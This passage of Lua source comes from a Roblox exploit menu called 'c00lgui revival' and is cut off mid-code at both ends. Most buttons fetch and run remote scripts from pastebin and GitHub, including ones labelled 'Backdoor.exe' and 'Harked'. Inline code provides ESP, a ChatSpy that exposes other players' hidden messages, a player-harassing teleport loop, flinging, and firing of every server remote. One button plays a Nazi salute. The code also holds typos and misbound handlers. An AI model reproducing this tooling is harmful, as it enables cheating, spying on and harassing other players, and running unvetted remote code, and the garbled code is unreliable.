button_52.TextColor3 = Color3.fromRGB(255, 255, 255) button_52.TextSize = 14.000 buuton_52.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/543t1bwT", true))() end) button_53.Name = "button" button_53.Parent = ipg_3 button_53.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_53.BorderColor3 = Color3.fromRGB(255, 0, 0) button_53.BorderSizePixel = 3 button_53.Position = UDim2.new(0.513999999, 0, 0.345473647, 0) button_53.Size = UDim2.new(0, 71, 0, 25) button_53.Font = Enum.Font.SourceSans button_53.TextColor3 = Color3.fromRGB(255, 255, 255) button_53.TextSize = 14.000 button_54.Name = "button" button_54.Parent = ipg_3 button_54.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_54.BorderColor3 = Color3.fromRGB(255, 0, 0) button_54.BorderSizePixel = 3 button_54.Position = UDim2.new(0, 0, 0.427631587, 0) button_54.Size = UDim2.new(0, 71, 0, 25) button_54.Font = Enum.Font.SourceSans button_54.TextColor3 = Color3.fromRGB(255, 255, 255) button_54.TextSize = 14.000 button_55.Name = "button" button_55.Parent = ipg_3 button_55.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_55.BorderColor3 = Color3.fromRGB(255, 0, 0) button_55.BorderSizePixel = 3 button_55.Position = UDim2.new(0.513698637, 0, 0.427631587, 0) button_55.Size = UDim2.new(0, 71, 0, 25) button_55.Font = Enum.Font.SourceSans button_55.TextColor3 = Color3.fromRGB(255, 255, 255) button_55.TextSize = 14.000 button_56.Name = "button" button_56.Parent = ipg_3 button_56.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_56.BorderColor3 = Color3.fromRGB(255, 0, 0) button_56.BorderSizePixel = 3 button_56.Position = UDim2.new(0, 0, 0.5099473, 0) button_56.Size = UDim2.new(0, 71, 0, 25) button_56.Font = Enum.Font.SourceSans button_56.TextColor3 = Color3.fromRGB(255, 255, 255) button_56.TextSize = 14.000 button_57.Name = "button" button_57.Parent = ipg_3 button_57.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_57.BorderColor3 = Color3.fromRGB(255, 0, 0) button_57.BorderSizePixel = 3 button_57.Position = UDim2.new(0.513999999, 0, 0.5099473, 0) button_57.Size = UDim2.new(0, 71, 0, 25) button_57.Font = Enum.Font.SourceSans button_57.TextColor3 = Color3.fromRGB(255, 255, 255) button_57.TextSize = 14.000 button_58.Name = "button" button_58.Parent = ipg_3 button_58.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_58.BorderColor3 = Color3.fromRGB(255, 0, 0) button_58.BorderSizePixel = 3 button_58.Position = UDim2.new(0.513698637, 0, 0.592105269, 0) button_58.Size = UDim2.new(0, 71, 0, 25) button_58.Font = Enum.Font.SourceSans button_58.TextColor3 = Color3.fromRGB(255, 255, 255) button_58.TextSize = 14.000 button_59.Name = "button" button_59.Parent = ipg_3 button_59.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_59.BorderColor3 = Color3.fromRGB(255, 0, 0) button_59.BorderSizePixel = 3 button_59.Position = UDim2.new(0, 0, 0.592105269, 0) button_59.Size = UDim2.new(0, 71, 0, 25) button_59.Font = Enum.Font.SourceSans button_59.TextColor3 = Color3.fromRGB(255, 255, 255) button_59.TextSize = 14.000 button_60.Name = "button" button_60.Parent = ipg_3 button_60.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_60.BorderColor3 = Color3.fromRGB(255, 0, 0) button_60.BorderSizePixel = 3 button_60.Position = UDim2.new(0.513999999, 0, 0.674421012, 0) button_60.Size = UDim2.new(0, 71, 0, 25) button_60.Font = Enum.Font.SourceSans button_60.TextColor3 = Color3.fromRGB(255, 255, 255) button_60.TextSize = 14.000 button_61.Name = "button" button_61.Parent = ipg_3 button_61.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_61.BorderColor3 = Color3.fromRGB(255, 0, 0) button_61.BorderSizePixel = 3 button_61.Position = UDim2.new(0, 0, 0.674421012, 0) button_61.Size = UDim2.new(0, 71, 0, 25) button_61.Font = Enum.Font.SourceSans button_61.TextColor3 = Color3.fromRGB(255, 255, 255) button_61.TextSize = 14.000 ipg2_3.Name = "ipg2" ipg2_3.Parent = pg3 ipg2_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0) ipg2_3.BorderColor3 = Color3.fromRGB(255, 0, 0) ipg2_3.BorderSizePixel = 3 ipg2_3.Position = UDim2.new(0.49666667, 0, 0, 0) ipg2_3.Size = UDim2.new(0, 150, 0, 304) pgt_6.Name = "pgt" pgt_6.Parent = ipg2_3 pgt_6.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pgt_6.BorderColor3 = Color3.fromRGB(255, 0, 0) pgt_6.BorderSizePixel = 3 pgt_6.Size = UDim2.new(0, 150, 0, 30) pgt_6.Font = Enum.Font.SourceSansBold pgt_6.Text = "FE Scripts" pgt_6.TextColor3 = Color3.fromRGB(255, 255, 255) pgt_6.TextSize = 14.000 pgt_6.TextWrapped = true button_62.Name = "button" button_62.Parent = ipg2_3 button_62.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_62.BorderColor3 = Color3.fromRGB(255, 0, 0) button_62.BorderSizePixel = 3 button_62.Position = UDim2.new(0.51399982, 0, 0.345473647, 0) button_62.Size = UDim2.new(0, 73, 0, 25) button_62.Font = Enum.Font.SourceSans button_62.Text = "The Flash" button_62.TextColor3 = Color3.fromRGB(255, 255, 255) button_62.TextSize = 14.000 button_62.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/o5u3/T0PK3K-REMAKE/scripts/flash.txt"))() end) button_63.Name = "button" button_63.Parent = ipg2_3 button_63.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_63.BorderColor3 = Color3.fromRGB(255, 0, 0) button_63.BorderSizePixel = 3 button_63.Position = UDim2.new(0, 0, 0.427631587, 0) button_63.Size = UDim2.new(0, 71, 0, 25) button_63.Font = Enum.Font.SourceSans button_63.Text = "Button" button_63.TextColor3 = Color3.fromRGB(255, 255, 255) button_63.TextSize = 14.000 button_64.Name = "button" button_64.Parent = ipg2_3 button_64.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_64.BorderColor3 = Color3.fromRGB(255, 0, 0) button_64.BorderSizePixel = 3 button_64.Position = UDim2.new(0.513698757, 0, 0.427631587, 0) button_64.Size = UDim2.new(0, 73, 0, 25) button_64.Font = Enum.Font.SourceSans button_64.Text = "Penis Script" button_64.TextColor3 = Color3.fromRGB(255, 255, 255) button_64.TextSize = 14.000 button.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/NamelessAdmin/main/pp"))() end) button_65.Name = "button" button_65.Parent = ipg2_3 button_65.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_65.BorderColor3 = Color3.fromRGB(255, 0, 0) button_65.BorderSizePixel = 3 button_65.Position = UDim2.new(0, 0, 0.345473647, 0) button_65.Size = UDim2.new(0, 71, 0, 25) button_65.Font = Enum.Font.SourceSans button_65.Text = "ESP" button_65.TextColor3 = Color3.fromRGB(255, 255, 255) button_65.TextSize = 14.000 button_65.MouseButton1Down:connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local Players = game:GetService("Players") local RunService = game:GetService("RunService") local LP = Players.LocalPlayer local roles function CreateAllHighlight(p) for i, v in pairs(game.Players:GetChildren()) do if v ~= LP and v.Character and not v.Character:FindFirstChild("Highlight") then Instance.new("Highlight", v.Character) end end end function UpdateAllHighlights() for _, v in pairs(game.Players:GetChildren()) do if v ~= LP and v.Character and v.Character:FindFirstChild("Highlight") then Highlight = v.Character:FindFirstChild("Highlight") Highlight.FillColor = Color3.fromRGB(0, 225, 0) end end end function CreateHighlight(p) for i, v in pairs(p:GetChildren()) do if v ~= LP and v.Character and not v.Character:FindFirstChild("Highlight") then Instance.new("Highlight", v.Character) end end end function UpdateHighlights(p) for _, v in pairs(p:GetChildren()) do if v ~= LP and v.Character and v.Character:FindFirstChild("Highlight") then Highlight = v.Character:FindFirstChild("Highlight") Highlight.FillColor = Color3.fromRGB(0, 225, 0) end end end function IsAlive(Player) for i, v in pairs(roles) do if Player.Name == i then if not v.Killed and not v.Dead then return true else return false end end end end CreateAllHighlight() UpdateAllHighlights(game.Players) Players = game.Players COREGUI = game.CoreGui for i,plr in pairs(game.Players:GetChildren()) do for i,v in pairs(COREGUI:GetChildren()) do if v.Name == plr.Name..'_ESP' then v:Destroy() end if plr.Character and plr.Name ~= Players.LocalPlayer.Name and not COREGUI:FindFirstChild(plr.Name..'_ESP') then local ESPholder = Instance.new("Folder") ESPholder.Name = plr.Name..'_ESP' ESPholder.Parent = COREGUI if plr.Character and plr.Character:FindFirstChild('Head') then local BillboardGui = Instance.new("BillboardGui") local TextLabel = Instance.new("TextLabel") BillboardGui.Adornee = plr.Character.Head BillboardGui.Name = plr.Name BillboardGui.Parent = ESPholder BillboardGui.Size = UDim2.new(0, 100, 0, 150) BillboardGui.StudsOffset = Vector3.new(0, 1, 0) BillboardGui.AlwaysOnTop = true TextLabel.Parent = BillboardGui TextLabel.BackgroundTransparency = 1 TextLabel.Position = UDim2.new(0, 0, 0, -50) TextLabel.Size = UDim2.new(0, 100, 0, 100) TextLabel.Font = Enum.Font.SourceSansSemibold TextLabel.TextSize = 17 TextLabel.TextColor3 = Color3.new(12, 4, 20) TextLabel.TextStrokeTransparency = 0.3 TextLabel.TextYAlignment = Enum.TextYAlignment.Bottom TextLabel.Text = '@'..plr.Name .. ' | ' .. plr.DisplayName .. '' TextLabel.ZIndex = 10 local espLoopFunc local teamChange local addedFunc end end end addedFunc = plr.CharacterAdded:Connect(function() wait(2) CreateHighlight(plr) UpdateHighlights(plr) if ESPenabled then espLoopFunc:Disconnect() teamChange:Disconnect() ESPholder:Destroy() repeat wait(1) until plr.Character.HumanoidRootPart and plr.Character:FindFirstChildOfClass("Humanoid") ESP(plr) else addedFunc:Disconnect() end end) end end) button_66.Name = "button" button_66.Parent = ipg2_3 button_66.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_66.BorderColor3 = Color3.fromRGB(255, 0, 0) button_66.BorderSizePixel = 3 button_66.Position = UDim2.new(0, 0, 0.263157904, 0) button_66.Size = UDim2.new(0, 71, 0, 25) button_66.Font = Enum.Font.SourceSans button_66.Text = "Backflip" button_66.TextColor3 = Color3.fromRGB(255, 255, 255) button_66.TextSize = 14.000 button_66.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/DPQzQ6Gi"))(); end) button_67.Name = "button" button_67.Parent = ipg2_3 button_67.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_67.BorderColor3 = Color3.fromRGB(255, 0, 0) button_67.BorderSizePixel = 3 button_67.Position = UDim2.new(0.513698757, 0, 0.263157904, 0) button_67.Size = UDim2.new(0, 73, 0, 25) button_67.Font = Enum.Font.SourceSans button_67.Text = "Nazi Salute" button_67.TextColor3 = Color3.fromRGB(255, 255, 255) button_67.TextSize = 14.000 button_67.MouseButton1Down:connect(function() --- [R6] FE salute --- --- Edited by nul#3174 --- --- Credits to the unknown original creator --- local UIS = game:GetService("UserInputService") local Posed = false local Player = game.Players.LocalPlayer local Animation = Instance.new("Animation") Animation.AnimationId = "rbxassetid://186434728" local Track = Player.Character.Humanoid:LoadAnimation(Animation) local function onRan() UIS.InputBegan:Connect(function(input, gameProcessed) if input.KeyCode == Enum.KeyCode.H and not Posed and UIS:GetFocusedTextBox() == nil then Posed = true Track:Play() wait(.05) Track:AdjustSpeed(0) elseif input.KeyCode == Enum.KeyCode.H and Posed and UIS:GetFocusedTextBox() == nil then Posed = false Track:Stop() end end) end onRan() local function onDeath() Player.CharacterAdded:Wait() repeat wait() until Player.Character:FindFirstChild("Humanoid") Track = Player.Character.Humanoid:LoadAnimation(Animation) UIS.InputBegan:Connect(function(input, gameProcessed) if input.KeyCode == Enum.KeyCode.H and not Posed and UIS:GetFocusedTextBox() == nil then Posed = true Track:Play() wait(.05) Track:AdjustSpeed(0) elseif input.KeyCode == Enum.KeyCode.H and Posed and UIS:GetFocusedTextBox() == nil then Posed = false Track:Stop() end end) end Player.Character:WaitForChild("Humanoid").Died:Connect(function() onDeath() onRan() end) Player.CharacterAdded:Connect(function() onDeath() onRan() end) end) button_68.Name = "button" button_68.Parent = ipg2_3 button_68.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_68.BorderColor3 = Color3.fromRGB(255, 0, 0) button_68.BorderSizePixel = 3 button_68.Position = UDim2.new(0, 0, 0.180999994, 0) button_68.Size = UDim2.new(0, 71, 0, 25) button_68.Font = Enum.Font.SourceSans button_68.Text = "Annoy Gui" button_68.TextColor3 = Color3.fromRGB(255, 255, 255) button_68.TextSize = 14.000 button_68.MouseButton1Down:connect(function() -- Gui to Lua -- Version: 3.2 -- Instances: local ScreenGui = Instance.new("ScreenGui") local TextButton = Instance.new("TextButton") local TextBox = Instance.new("TextBox") local Stop = Instance.new("TextButton") local TextButton_2 = Instance.new("TextButton") local Stopped = Instance.new("NumberValue") --Properties: Stopped.Name = "Stopped" Stopped.Parent = ScreenGui Stopped.Value = 0 --Properties: ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling ScreenGui.ResetOnSpawn = false TextButton.Parent = ScreenGui TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextButton.BackgroundTransparency = 0.500 TextButton.Size = UDim2.new(0, 200, 0, 50) TextButton.Font = Enum.Font.SourceSans TextButton.Text = "Anoy" TextButton.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton.TextScaled = true TextButton.TextSize = 14.000 TextButton.TextWrapped = true TextBox.Parent = ScreenGui TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextBox.BackgroundTransparency = 0.500 TextBox.Position = UDim2.new(0, 0, 0.0621890537, 0) TextBox.Size = UDim2.new(0, 200, 0, 50) TextBox.Font = Enum.Font.SourceSans TextBox.Text = "Username" TextBox.TextColor3 = Color3.fromRGB(0, 0, 0) TextBox.TextSize = 14.000 Stop.Name = "Stop" Stop.Parent = ScreenGui Stop.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Stop.BackgroundTransparency = 0.500 Stop.Position = UDim2.new(0, 200, 0, 0) Stop.Size = UDim2.new(0, 200, 0, 50) Stop.Font = Enum.Font.SourceSans Stop.Text = "Stop" Stop.TextColor3 = Color3.fromRGB(0, 0, 0) Stop.TextScaled = true Stop.TextSize = 14.000 Stop.TextWrapped = true TextButton_2.Parent = ScreenGui TextButton_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextButton_2.BackgroundTransparency = 0.500 TextButton_2.Position = UDim2.new(0, 200, 0, 50) TextButton_2.Size = UDim2.new(0, 200, 0, 50) TextButton_2.Font = Enum.Font.SourceSans TextButton_2.Text = "SUPER ANOY" TextButton_2.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_2.TextScaled = true TextButton_2.TextSize = 14.000 TextButton_2.TextWrapped = true -- Scripts: local function VXTUVGF_fake_script() -- TextButton.LocalScript local script = Instance.new('LocalScript', TextButton) --Usernamesareforgeeks1#0860 script.Parent.MouseButton1Down:Connect(function(click) while wait() do local power = script.Parent.Parent.TextBox.Text local p1 = game.Players.LocalPlayer.Character.HumanoidRootPart local target = script.Parent.Parent.TextBox.Text p1.CFrame = game.Players[target].Character.HumanoidRootPart.CFrame p1.CFrame = p1.CFrame *CFrame.fromEulerAnglesXYZ(5,5,5) if script.Parent.Parent.Stopped.Value == 1 then break end end end) end coroutine.wrap(VXTUVGF_fake_script)() local function DXRLV_fake_script() -- Stop.LocalScript local script = Instance.new('LocalScript', Stop) --Usernamesareforgeeks1#0860 script.Parent.MouseButton1Down:Connect(function(click) script.Parent.Parent.Stopped.Value = 1 script.Parent.Text = "Stopping, Please re execute the script if u want to use it again" wait(2) script.Parent.Parent:Remove() end) end coroutine.wrap(DXRLV_fake_script)() local function LGUO_fake_script() -- TextButton_2.LocalScript local script = Instance.new('LocalScript', TextButton_2) --Usernamesareforgeeks1#0860 script.Parent.MouseButton1Down:Connect(function(click) while wait() do local power = script.Parent.Parent.TextBox.Text local p1 = game.Players.LocalPlayer.Character.HumanoidRootPart local target = script.Parent.Parent.TextBox.Text p1.CFrame = game.Players[target].Character.HumanoidRootPart.CFrame p1.CFrame = p1.CFrame *CFrame.fromEulerAnglesXYZ(1,1,1) if script.Parent.Parent.Stopped.Value == 1 then break end end end) end coroutine.wrap(LGUO_fake_script)() end) button_69.Name = "button" button_69.Parent = ipg2_3 button_69.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_69.BorderColor3 = Color3.fromRGB(255, 0, 0) button_69.BorderSizePixel = 3 button_69.Position = UDim2.new(0, 0, 0.0986842141, 0) button_69.Size = UDim2.new(0, 71, 0, 25) button_69.Font = Enum.Font.SourceSans button_69.Text = "Walk on Walls" button_69.TextColor3 = Color3.fromRGB(255, 255, 255) button_69.TextSize = 14.000 button_69.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/H4c2LpFF"))(); end) button_70.Name = "button" button_70.Parent = ipg2_3 button_70.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_70.BorderColor3 = Color3.fromRGB(255, 0, 0) button_70.BorderSizePixel = 3 button_70.Position = UDim2.new(0.51399982, 0, 0.18099995, 0) button_70.Size = UDim2.new(0, 73, 0, 25) button_70.Font = Enum.Font.SourceSans button_70.Text = "ChatSpy" button_70.TextColor3 = Color3.fromRGB(255, 255, 255) button_70.TextSize = 14.000 button_70.MouseButton1Down:connect(function() --This script reveals ALL hidden messages in the default chat enabled = true --chat "/spy" to toggle! spyOnMyself = true --if true will check your messages too public = false --if true will chat the logs publicly (fun, risky) publicItalics = true --if true will use /me to stand out privateProperties = { --customize private logs Color = Color3.fromRGB(0,255,255); Font = Enum.Font.SourceSansBold; TextSize = 18; } local StarterGui = game:GetService("StarterGui") local Players = game:GetService("Players") local player = Players.LocalPlayer or Players:GetPropertyChangedSignal("LocalPlayer"):Wait() or Players.LocalPlayer local saymsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest") local getmsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("OnMessageDoneFiltering") local instance = (_G.chatSpyInstance or 0) + 1 _G.chatSpyInstance = instance local function onChatted(p,msg) if _G.chatSpyInstance == instance then if p==player and msg:lower():sub(1,4)=="/spy" then enabled = not enabled wait(0.3) privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}" StarterGui:SetCore("ChatMakeSystemMessage",privateProperties) elseif enabled and (spyOnMyself==true or p~=player) then msg = msg:gsub("[\n\r]",''):gsub("\t",' '):gsub("[ ]+",' ') local hidden = true local conn = getmsg.OnClientEvent:Connect(function(packet,channel) if packet.SpeakerUserId==p.UserId and packet.Message==msg:sub(#msg-#packet.Message+1) and (channel=="All" or (channel=="Team" and public==false and Players[packet.FromSpeaker].Team==player.Team)) then hidden = false end end) wait(1) conn:Disconnect() if hidden and enabled then if public then saymsg:FireServer((publicItalics and "/me " or '').."{SPY} [".. p.Name .."]: "..msg,"All") else privateProperties.Text = "{SPY} [".. p.Name .."]: "..msg StarterGui:SetCore("ChatMakeSystemMessage",privateProperties) end end end end end for _,p in ipairs(Players:GetPlayers()) do p.Chatted:Connect(function(msg) onChatted(p,msg) end) end Players.PlayerAdded:Connect(function(p) p.Chatted:Connect(function(msg) onChatted(p,msg) end) end) privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}" StarterGui:SetCore("ChatMakeSystemMessage",privateProperties) if not player.PlayerGui:FindFirstChild("Chat") then wait(3) end local chatFrame = player.PlayerGui.Chat.Frame chatFrame.ChatChannelParentFrame.Visible = true chatFrame.ChatBarParentFrame.Position = chatFrame.ChatChannelParentFrame.Position+UDim2.new(UDim.new(),chatFrame.ChatChannelParentFrame.Size.Y) end) button_71.Name = "button" button_71.Parent = ipg2_3 button_71.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_71.BorderColor3 = Color3.fromRGB(255, 0, 0) button_71.BorderSizePixel = 3 button_71.Position = UDim2.new(0.513698757, 0, 0.0986842141, 0) button_71.Size = UDim2.new(0, 73, 0, 25) button_71.Font = Enum.Font.SourceSans button_71.Text = "Hair Fling" button_71.TextColor3 = Color3.fromRGB(255, 255, 255) button_71.TextSize = 14.000 button_71.MouseButton1Down:connect(function() --script made by kuraga#4659 for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do if v.ClassName == "Accessory" then v.Parent = workspace end end game.Players.LocalPlayer.Character:BreakJoints() wait(7) game.Players.LocalPlayer.MaximumSimulationRadius = math.pow(math.huge,math.huge)*math.huge game.Players.LocalPlayer.SimulationRadius = math.pow(math.huge,math.huge)*math.huge game:GetService("RunService").Stepped:wait() v = game.Workspace["LongStraightHair"].Handle local temp = Instance.new("BodyPosition") temp.MaxForce = Vector3.new(math.huge,math.huge,math.huge) temp.Parent = v game.Players.LocalPlayer.MaximumSimulationRadius = math.pow(math.huge,math.huge)*math.huge game.Players.LocalPlayer.SimulationRadius = math.pow(math.huge,math.huge)*math.huge game:GetService("RunService").Stepped:wait() local temp1 = Instance.new("BodyThrust") temp1.Location = Vector3.new(5,0,0) temp1.Force = Vector3.new(4000,4000,4000) temp1.Parent = v v.CanCollide = false while wait() do temp.Position = game.Players.LocalPlayer:GetMouse().Hit.p + Vector3.new(0,1,0) end end) pg4.Name = "pg4" pg4.Parent = CoolGui pg4.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pg4.BorderColor3 = Color3.fromRGB(255, 0, 0) pg4.BorderSizePixel = 3 pg4.Position = UDim2.new(0, 0, 0.190000042, 0) pg4.Size = UDim2.new(0, 300, 0, 304) pg4.Visible = false ipg_4.Name = "ipg" ipg_4.Parent = pg4 ipg_4.BackgroundColor3 = Color3.fromRGB(0, 0, 0) ipg_4.BorderColor3 = Color3.fromRGB(255, 0, 0) ipg_4.BorderSizePixel = 3 ipg_4.Size = UDim2.new(0, 146, 0, 304) pgt_7.Name = "pgt" pgt_7.Parent = ipg_4 pgt_7.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pgt_7.BorderColor3 = Color3.fromRGB(255, 0, 0) pgt_7.BorderSizePixel = 3 pgt_7.Size = UDim2.new(0, 146, 0, 30) pgt_7.Font = Enum.Font.SourceSansBold pgt_7.Text = "Remote Vulnerabilities" pgt_7.TextColor3 = Color3.fromRGB(255, 255, 255) pgt_7.TextSize = 14.000 pgt_7.TextWrapped = true button_72.Name = "button" button_72.Parent = ipg_4 button_72.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_72.BorderColor3 = Color3.fromRGB(255, 0, 0) button_72.BorderSizePixel = 3 button_72.Position = UDim2.new(0.513698637, 0, 0.0986842141, 0) button_72.Size = UDim2.new(0, 71, 0, 25) button_72.Font = Enum.Font.SourceSans button_72.Text = "Backdoor.exe" button_72.TextColor3 = Color3.fromRGB(255, 255, 255) button_72.TextSize = 14.000 button_72.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/P1ayeCf5"))() end) button_73.Name = "button" button_73.Parent = ipg_4 button_73.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_73.BorderColor3 = Color3.fromRGB(255, 0, 0) button_73.BorderSizePixel = 3 button_73.Position = UDim2.new(0.513999999, 0, 0.180999994, 0) button_73.Size = UDim2.new(0, 71, 0, 25) button_73.Font = Enum.Font.SourceSans button_73.Text = "Fire Remotes" button_73.TextColor3 = Color3.fromRGB(255, 255, 255) button_73.TextSize = 14.000 button_73.MouseButton1Down:connect(function() local remoteamount = 0 for i,v in pairs(game:GetDescendants()) do if v:IsA("RemoteEvent") then remoteamount = remoteamount + 1 v:FireServer() if v:IsA("BindableEvent") then remoteamount = remoteamount + 1 v:Fire() if v:IsA("RemoteFunction") then remoteamount = remoteamount + 1 v:InvokeServer() end end end end end) button_74.Name = "button" button_74.Parent = ipg_4 button_74.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_74.BorderColor3 = Color3.fromRGB(255, 0, 0) button_74.BorderSizePixel = 3 button_74.Position = UDim2.new(0, 0, 0.180999994, 0) button_74.Size = UDim2.new(0, 71, 0, 25) button_74.Font = Enum.Font.SourceSans button_74.Text = "Comet" button_74.TextColor3 = Color3.fromRGB(255, 255, 255) button_74.TextSize = 14.000 button_74.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/FE/main/Comet"))() end) button_75.Name = "button" button_75.Parent = ipg_4 button_75.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_75.BorderColor3 = Color3.fromRGB(255, 0, 0) button_75.BorderSizePixel = 3 button_75.Position = UDim2.new(0, 0, 0.0986842141, 0) button_75.Size = UDim2.new(0, 71, 0, 25) button_75.Font = Enum.Font.SourceSans button_75.Text = "Harked" button_75.TextColor3 = Color3.fromRGB(255, 255, 255) button_75.TextSize = 14.000 button_75.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/JxcExploit/Harkedv2-script/main/Leaked-v2hardked"))() end) cpg.Name = "cpg" cpg.Parent = ipg_4 cpg.BackgroundColor3 = Color3.fromRGB(0, 0, 0) cpg.BorderColor3 = Color3.fromRGB(255, 0, 0) cpg.BorderSizePixel = 3 cpg.Position = UDim2.new(1.02406394, 0, 0, 0) cpg.Size = UDim2.new(0, 150, 0, 304) credits.Name = "credits" credits.Parent = cpg credits.BackgroundColor3 = Color3.fromRGB(0, 0, 0) credits.BorderColor3 = Color3.fromRGB(255, 0, 0) credits.BorderSizePixel = 3 credits.Size = UDim2.new(0, 149, 0, 304) credits.Font = Enum.Font.SourceSans credits.Text = "thanks for using c00lgui revival!\\n\\nWant to join our team? go to this discord link!\\nhttps://discord.com/invite/KkhpkGJdCp\\n\\nShoutout to:\\nYourLocalC00LKidd\\n007n7\\nyogosothoth5830\\nHyperion (me)\\nc00lkidd (007n7)\\nand you!" credits.TextColor3 = Color3.fromRGB(255, 255, 255) credits.TextSize = 14.000 credits.TextWrapped = true addon.Name = "addon" addon.Parent = CoolGui addon.BackgroundColor3 = Color3.fromRGB(0, 0, 0) addon.BorderColor3 = Color3.fromRGB(255, 0, 0) addon.BorderSizePixel = 3 addon.Position = UDim2.new(1, 0, 0, 0) addon.Size = UDim2.new(0, 300, 0, 400) stitle.Name = "stitle" stitle.Parent = addon stitle.BackgroundColor3 = Color3.fromRGB(0, 0, 0) stitle.BorderColor3 = Color3.fromRGB(255, 0, 0) stitle.BorderSizePixel = 3 stitle.Size = UDim2.new(0, 300, 0, 40) stitle.Font = Enum.Font.SourceSans stitle.Text = "Settings" stitle.TextColor3 = Color3.fromRGB(255, 255, 255) stitle.TextSize = 24.000 slabel.Name = "slabel" slabel.Parent = addon slabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0) slabel.BorderColor3 = Color3.fromRGB(255, 0, 0) slabel.BorderSizePixel = 3 slabel.Position = UDim2.new(0, 0, 0.107500002, 0) slabel.Size = UDim2.new(0, 150, 0, 30) slabel.Font = Enum.Font.SourceSansBold slabel.Text = "Spam Text" slabel.TextColor3 = Color3.fromRGB(255, 255, 255) slabel.TextSize = 14.000 slabel.TextWrapped = true slabel_2.Name = "slabel" slabel_2.Parent = addon slabel_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) slabel_2.BorderColor3 = Color3.fromRGB(255, 0, 0) slabel_2.BorderSizePixel = 3 slabel_2.Position = UDim2.new(0.519999981, 0, 0.107500002, 0) slabel_2.Size = UDim2.new(0, 144, 0, 30) slabel_2.Font = Enum.Font.SourceSansBold slabel_2.Text = "Walkspeed Value" slabel_2.TextColor3 = Color3.fromRGB(255, 255, 255) slabel_2.TextSize = 14.000 slabel_2.TextWrapped = true input.Name = "input" input.Parent = addon input.BackgroundColor3 = Color3.fromRGB(0, 0, 0) input.BorderColor3 = Color3.fromRGB(255, 0, 0) input.BorderSizePixel = 3 input.Position = UDim2.new(0, 0, 0.189999998, 0) input.Size = UDim2.new(0, 150, 0, 30) input.Font = Enum.Font.SourceSans input.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) input.PlaceholderText = "Input" input.Text = "" input.TextColor3 = Color3.fromRGB(255, 255, 255) input.TextSize = 14.000 input.TextWrapped = true input_2.Name = "input" input_2.Parent = addon input_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) input_2.BorderColor3 = Color3.fromRGB(255, 0, 0) input_2.BorderSizePixel = 3 input_2.Position = UDim2.new(0.519999981, 0, 0.189999998, 0) input_2.Size = UDim2.new(0, 144, 0, 30) input_2.Font = Enum.Font.SourceSans input_2.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) input_2.PlaceholderText = "Input" input_2.Text = "" input_2.TextColor3 = Color3.fromRGB(255, 255, 255) input_2.TextSize = 14.000 input_2.TextWrapped = true slabel_3.Name = "slabel" slabel_3.Parent = addon slabel_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0) slabel_3.BorderColor3 = Color3.fromRGB(255, 0, 0) slabel_3.BorderSizePixel = 3 slabel_3.Position = UDim2.new(0, 0, 0.280000001, 0) slabel_3.Size = UDim2.new(0, 150, 0, 30) slabel_3.Font = Enum.Font.SourceSansBold slabel_3.Text = "Set Gravity" slabel_3.TextColor3 = Color3.fromRGB(255, 255, 255) slabel_3.TextSize = 14.000 slabel_3.TextWrapped = true input_3.Name = "input" input_3.Parent = addon input_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0) input_3.BorderColor3 = Color3.fromRGB(255, 0, 0) input_3.BorderSizePixel = 3 input_3.Position = 